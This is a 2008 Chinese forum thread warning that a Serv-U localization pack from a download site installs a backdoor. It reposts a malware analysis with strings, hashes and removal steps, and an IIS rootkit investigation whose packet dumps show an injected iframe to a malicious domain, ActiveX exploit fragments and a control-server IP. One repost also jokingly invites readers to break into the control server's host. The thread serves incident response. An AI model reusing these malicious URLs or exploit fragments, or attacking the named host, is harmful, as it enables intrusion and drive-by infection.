曾经装过霏凡下载的Serv-U6.4.0.6 注意了。有病毒。
一直很奇怪, 我的机房和我的服务器是不应该有ARP的。 也查不出来。 但症状是ARP一样。 网页代码自动插入IFRAME。 后来搜索了几个可疑的DLL文件。 终于了解。 原因的确如此! 看如下转贴。XSRProto.sys简单分析
[url]http://coolersky.com/articles/virus/analyze/2008/0509/415.html[/url]
前两天给客户一个服务器安装Serv-U,客户给了一个Serv-U6.4.0.6版本,还包括一个汉化包,安装完成后,居然在防火墙上发现一个SYS的对外连接,晕!
C:\Windows\system32\drivers\XSRProto.sys
绝对不是好事情!去google了一下,发现一片文章:
走向死亡的霏凡软件站!!!
[url]http://hi.baidu.com/indexhtm/blog/item/f27e0ed5dbcd84c050da4b56.html[/url]
一、临时处理
且不说软件来自哪里,出问题了,总不能让我去重装服务器吧,先看看怎么处理吧。
1、先从防火墙禁止它的对外连接,然后分析启动项、进程、服务,最后发现在注册表服务中添加了XSRProto服务,调用的就是XSRProto.sys。
2、删除注册表项,删除sys文件,重起。
3、果然又创建出一个XSRProto.sys,注册表也重新添加了XSRProto服务,看起来没有这么简单,同事此时建议删除该文件,然后用txt文件改名为XSRProto.sys试试,删除,重起。
4、居然没有被替换,呵呵,比较少见,很少有这么处理的,只检测文件是否存在,存在就不管了,一般都是有就替换,没有就创建。
5、好了,暂时不影响服务器了,去分析下到底哪里出的问题。
二、简单分析
在vm下跑了一下安装程序和汉化包,发现是汉化包引起的,只要你双击执行了汉化包,后门就执行了,问题汉化包执行后会释放原始的汉化包,同时创建一个UPX加壳的some.exe。
文件信息:
XSRProto.sys
35,456 bytes MD5:286f6932711d14e9f6568535ad887a28
some.exe
55,296 bytes MD5:de2a6b1ee228a43581710a5e7e7f1371
朋友简单看了一下这两个文件,信息如下,有兴趣的看看它干了些什么,呵呵!
unpacked:004020E0 00000035 C SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost
unpacked:00402118 0000000C C \\user32.dll
unpacked:00402124 0000000B C ServiceDll
unpacked:00402130 00000021 C %SystemRoot%\\system32\\VMUSRV.dll
unpacked:00402154 00000034 C SYSTEM\\CurrentControlSet\\Services\\VMUSRV\\Parameters
unpacked:00402188 0000001D C Virtual Machine User Service
unpacked:004021A8 0000002C C %SystemRoot%\\system32\\svchost.exe -k VMUSRV
unpacked:004021D4 00000007 C VMUSRV
unpacked:004021DC 00000033 C :INS\r\nDEL \"%s\"\r\nif exist \"%s\" goto INS\r\nDEL \"%s\"\r\n
unpacked:00402210 0000000D C %s\\UNINS.bat
unpacked:00402220 00000006 C FILES
unpacked:00402234 0000000B C XSpoof-SR3
unpacked:00402240 0000000C C \\VMUSRV.dl_
unpacked:0040224C 0000000C C \\VMUSRV.dll
unpacked:00402258 00000011 C SeDebugPrivilege
unpacked:0040C408 0000005A C insert into T_XSSV (XS_Server,XS_UserName,XS_Password,XS_Type) values('%s','%s','%s',%u)
unpacked:0040C468 0000006C C update T_XSSV set XS_Password='%s',XS_Update=False where XS_Server='%s' AND XS_UserName='%s' AND XS_Type=%d
unpacked:0040C4D8 0000004E C select * from T_XSSV where XS_Type=%d AND XS_Server='%s' AND XS_UserName='%s'
unpacked:0040C528 0000000B C XSpoof-SR3
unpacked:0040C534 00000009 C DATABASE
unpacked:0040C540 00000005 C \\inf
unpacked:0040C558 00000007 C VMUSRV
unpacked:0040C664 00000035 C SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost
unpacked:0040C69C 0000002B C SYSTEM\\CurrentControlSet\\Services\\XSRProto
unpacked:0040C6C8 00000029 C SYSTEM\\CurrentControlSet\\Services\\VMUSRV
unpacked:0040C6F4 00000009 C XSRProto
unpacked:0040C700 0000002D C update T_XSSV set XS_Update=True where ID=%u
unpacked:0040C730 00000008 C XS_Type
unpacked:0040C738 0000000C C XS_Password
unpacked:0040C744 0000000C C XS_UserName
unpacked:0040C750 0000000A C XS_Server
unpacked:0040C760 0000002B C select * from T_XSSV where XS_Update=false
unpacked:0040C78C 0000001E C system32\\DRIVERS\\XSRProto.sys
unpacked:0040C7AC 00000009 C \\\\.\\XSR3
unpacked:0040C7B8 00000006 C POST
unpacked:0040C7C0 0000000C C http://%s%s
_adjust_fdiv
.snaker:00439352 00000011 C __setusermatherr
.snaker:00439366 0000000A C _initterm
.snaker:00439372 0000000E C __getmainargs
.snaker:00439382 00000008 C _acmdln
.snaker:0043938C 00000005 C exit
.snaker:00439394 0000000C C _XcptFilter
.snaker:004393A2 00000006 C _exit
.snaker:004393AA 00000011 C _except_handler3
.snaker:004393BE 00000008 C sprintf
.snaker:004393C8 0000000B C __p__fmode
基本了解了some.exe干了些什么,有兴趣的下载汉化包去看看。
三、简单处理
通过分析,我们可以简单的处理掉这个后门。
1、删除注册表
HKLM\SYSTEM\CurrentControlSet\Services\VMUSRV
使用的还是“Virtual Machine User Service”,挺有迷惑性的
HKLM\SYSTEM\CurrentControlSet\Services\XSRProto
2、删除文件
C:\Windows\system32\drivers\XSRProto.sys
3、重起后删除
C:\Windows\system32\VMUSRV.dll
四、其他
看看文件的东西,其实蛮恐怖的,人家都使用数据库在管理肉鸡了,这年头没什么东西是可靠的,建议还是从官方下载文件,使用注册码一类的东西来处理。
就到这里了,帮Edward看个站去了!
-------------------------------------------------------------------
ProtoDrv.sys
XSRProto.sys
iisecnv.dll [url]http://blog.sina.com.cn/s/blog_4b59f0fb010096xt.html[/url]
[url]http://hi.baidu.com/indexhtm/blog/item/f27e0ed5dbcd84c050da4b56.html[/url]
方法一硬盘格式为NTFS的,到SYSTEM32下找npptools.dll文件,点右键-安全(如果没有安全选项,打开文件夹选项,里面有个简单共享,去掉),然后在组或用户名称那里,有用户administrator、POWER、system、users等用户,每点一个用户,都会出现每个用户的权限,把允许那里,全部去掉,在拒绝下面的全选上。然后设置文件属性只读。这样可以.防止有的ARP自动生成此文件。
方法二 有说是直接删除system32\npptools.dll(可能病毒会携带复制这个文件)
方法三把system32\dllcache\npptoolst.dll和system32\npptools.dll都删掉,或直接新建一个文件或文件夹改成npptools.dll后复制到这两个文件夹下面,改成只读,然后改权限,添加everyone组,把这.个组的权限都拒绝掉,这样就可以保护这个文件不被病毒覆盖或修改了。(如windows文件保护不理会。)
ARP病毒缺少了npptools.dll这个文件就不.能运行,目前所发现的ARP病毒通通提示npptools.dll出错,无法运行
对于你说的那个删除它过一会就会出来,你没有必要去删除他,只要给.他设置相应的权限就可以了。
Ring0级的rootkit XFKnrl的发现、删除及其他 (2008-04-22 23:22:51)标签:root kit it
文章来自CU!看完后很有启发,故转载此处,以做收藏,以备不时之需.
1、
首先是发现浏览该服务器网页时,最底端加入了一段iframe:
[url]http://bh.jebooo.com/3002.htm[/url]
追查该代码,关键字:
BD96C556-65A3-11D0-983A-00C04FC29
var real=new ActiveXObject("IERPCtl.IERPCtl.1");
var storm=new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer");
var Lz=new ActiveXObject("GLC"+"HAT.G"+"LCh"+"atC"+"trl.1");
function GetCookie_cnzz(name)
应该是利用了ie的一些activex漏洞进行种木马和刷流量的操作
2、
追查工作暂时放到一边,首要问题是解决服务器异常
最开始是怀疑有arp攻击,登录到服务器上查看
arp -a得到网关mac,与正确的网关mac一致,windump抓包
windump -X -i 3 -n arp
也没有发现异常arp广播
检查web文件,也正常,底部并没有加码
初步确定是服务器本身有问题
3、
继续抓包,查看http包
windump -X -i 3 -s 65535 -n host **.**.**.** and port 80
发现在正常的页面请求结束前,被插入了一段
10:06:39.430635 IP xx.xx.xx.xx.80 > yy.yy.yy.yy.2407: P 254:325(71) ack 417
win 65119
0x0000: 4500 006f 1251 4000 8006 d0c4 d233 b9ca [email]E..o.Q@......3[/email]..
0x0010: d233 b941 0050 0967 fddc 6d08 11ce dc82 .3.A.P.g..m.....
0x0020: 5018 fe5f 17d5 0000 0d0a 3c69 6672 616d P.._......<ifram
0x0030: 6520 7372 633d 6874 7470 3a2f 2f62 682e e.src=http://bh.
0x0040: 6a65 626f 6f6f 2e63 6f6d 2f33 3030 322e jebooo.com/3002.
0x0050: 6874 6d20 7769 6474 683d 3020 6865 6967 htm.width=0.heig
0x0060: 6874 3d30 3e3c 2f69 6672 616d 653e 00 ht=0></iframe>.
正是页面底部被嵌入的iframe
这说明服务器的iis进程或网卡驱动被hook,在侦测到某种类型文件的http请求后,在传输结束前挂马
4、
检查服务器,查看进程、服务、N处注册表启动项、系统帐号
均未发现异常
请出icesword,检查内核模块,发现两个可疑的家伙
XFKnrl.sys 和 rvdport.sys
文件路径都是system32\drivers\,但到该目录下查找并没有这两个文件,基本能确定是rootkit了
正常的内核模块没必要隐藏自己
procexp搜索全部进程的handle,果然
发现在inetinfo进程中有 \device\XFKnrl加载项,iis被插了!
5、
用Wsyscheck和RkUnhooker再进一步检查内核模块和驱动
除了icesword查到的两个sys之外再没有其他发现
ssdt和fsd的各个函数也没有被hook的报告
NtQueryDirectoryFile
NtQuerySystemInformation
NtDeviceIoControlFile
都正常!
但在wsyscheck的“安全检查”-“端口状态”中发现,进程inetinfo每几秒就向61.164.176.139:3002发syn
12:01:20.108071 IP xx.xx.xx.xx.4627 > 61.164.176.139.3002: S 3273827924:32738
27924(0) win 65535 <mss 1460,nop,nop,sackOK>
0x0000: 4500 0030 125f 4000 8006 6e3b d233 b9ca [email]E..0._@...n[/email];.3..
0x0010: 3da4 b08b 1213 0bba c322 a654 0000 0000 =........".T....
0x0020: 7002 ffff 81ad 0000 0204 05b4 0101 0402 p...............
12:01:20.180418 IP 61.164.176.139.3002 > xx.xx.xx.xx.4627: R 0:0(0) ack 1 win
0
0x0000: 4500 0028 0186 0000 7306 cc1c 3da4 b08b E..(....s...=...
0x0010: d233 b9ca 0bba 1213 0000 0000 c322 a655 .3...........".U
0x0020: 5014 0000 ae5d 0000 aaaa 0000 aaaa P....]........
12:01:22.592705 IP xx.xx.xx.xx.4628 > 61.164.176.139.3002: S 1189036599:11890
36599(0) win 65535 <mss 1460,nop,nop,sackOK>
0x0000: 4500 0030 126a 4000 8006 6e30 d233 b9ca [email]E..0.j@...n0.3[/email]..
0x0010: 3da4 b08b 1214 0bba 46df 4237 0000 0000 =.......F.B7....
0x0020: 7002 ffff 620d 0000 0204 05b4 0101 0402 p...b...........
12:01:22.654909 IP 61.164.176.139.3002 > xx.xx.xx.xx.4628: R 0:0(0) ack 11890
36600 win 0
0x0000: 4500 0028 2deb 0000 7306 9fb7 3da4 b08b E..(-...s...=...
0x0010: d233 b9ca 0bba 1214 0000 0000 46df 4238 .3..........F.B8
0x0020: 5014 0000 8ebd 0000 aaaa 0000 aaaa P.............
61.164.176.139基本可以确定就是rootkit的控制端了
6、
google了一下XFKnrl,没发现太多有用的信息
只好先在system32\drivers\下建立两个0字节的文件XFKnrl.sys 和 rvdport.sys
删除所有文件权限,重启
web页面挂马问题消失,内核模块XFKnrl和rvdport也都没有加载
但进程inetinfo依然向61.164.176.139:3002发包!
先用组策略ipsec封掉到61.164.176.0/24网段和端口3002的通讯
继续检查系统
7、
再次procexp搜索全部进程的handle,没有发现XFKrnl和rvdport的踪影
又检查了一遍内核模块和驱动,没有新发现
目标锁定在了inetinfo进程上
用wsyscheck查inetinfo的线程信息,对比其他正常服务器的该项信息
发现异常线程iisencv.dll
procexp搜索全部进程的dll,发现iisencv.dll 插入到了inetinfo.exe和 w3wp.exe中
结束该线程后,inetinfo停止向61.164.176.139:3002发包!
但随后检查内核模块时发现,XFKnrl居然又被加载了!
这至少证明了iisencv.dll和XFKnrl.sys的关系
8、
搜索注册表iisencv.dll,发现
[HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603]
"000"="iisecnv.dll"
"001"="mswsock.dll"
"002"="ntdll.dll"
"003"="ntkrnlpa.exe"
"004"="*.gif"
"005"="usbcams3.sys"
"006"="AtiSrv.exe"
"007"="usbhcid.sys"
"008"="*.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5604]
"000"="jebooo"
"001"="bh.jebooo.com"
"002"="xf.jebooo.com"
9、
终极操作:
在system32\drivers\下建立两个0字节的文件XFKnrl.sys 和 rvdport.sys删除所有文件权限
删除注册表中相关项和文件
用wsyscheck的“重启后删除文件”功能,添加c:/windows/system32/inetsrv/iisencv.dll,重启
内核模块XFKnrl.sys和rvdport.sys没有被加载,inetinfo进程也不再发包,但IIS崩溃了!
重新安装iis,恢复.net2.0的web扩展服务,重建web站点,貌似一切恢复正常了。
10、
把iisencv.dll抓到本地,IDA pro分析
基本功能大致包括了:
httpfilter-过滤http协议
hook \\inetsrv\wamreg.dll
加载驱动 system32\drivers\XFKnrl.sys
调用cmd.exe
md5filt
aspnet_filter
CopyFileA DeleteFileA 隐藏和删除文件
大概能知道这个XFKnrl rootkit都做了些什么,它没有做隐藏进程和端口的操作,对文件也只是在内核模块加载到内存高位后进行删除操作,
所以查ssdt没有什么发现是正常的,开始我还以为真的有这么NB的rootkit可以绕过icesword、wsyscheck和RkUnhooker的检查呢!
主要的功能就是过滤http协议,外加得到一个反弹的shell,如果不是它的驱动是运行在kernel模式,还真不好意思叫它ring0 !
11、
后续问题:
先去拜访一下61.164.176.139
inetnum: 61.164.176.128 - 61.164.176.143
netname: YIWU-RONGJI-BUISNESS
country: CN
descr: Yiwu Rongji Handware Buisness
该段里有个应用系统
[url]http://www.lunababe.com/[/url]
估计也是漏洞一大堆,有兴趣的可以去看一下,也许能搞到XFKnrl的控制端,哈哈~
12、
唠叨几句:
中了rootkit最好还是重装
测试用服务器正式上线前最好也是重装
防火墙外运行的服务器拿到里边来之前最好也重装
尽量用从可靠途径获得的系统软件 286了,霏凡这个软件的每个版本的汉化都有后门 恶心的霏凡!出来不去 去那个mjj的 xdowns 去下载吧:ohh: [quote]原帖由 [i]wskyak[/i] 于 2008-5-12 20:09 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=26121386&ptid=2577262][img]http://www.im286.com/images/common/back.gif[/img][/url]
去那个mjj的 xdowns 去下载吧:ohh: [/quote]
去左拉下载! 你zuola 弄的还不如那个 xdown 恩 *** 作者被禁止或删除 内容自动屏蔽 *** 霏凡 有高人。 收藏学习 只去skycn和华军和官方 好几年前就是这个问题 糟糕了,我忘记我的 6.4 是不是在霏凡下载的了。
页:
[1]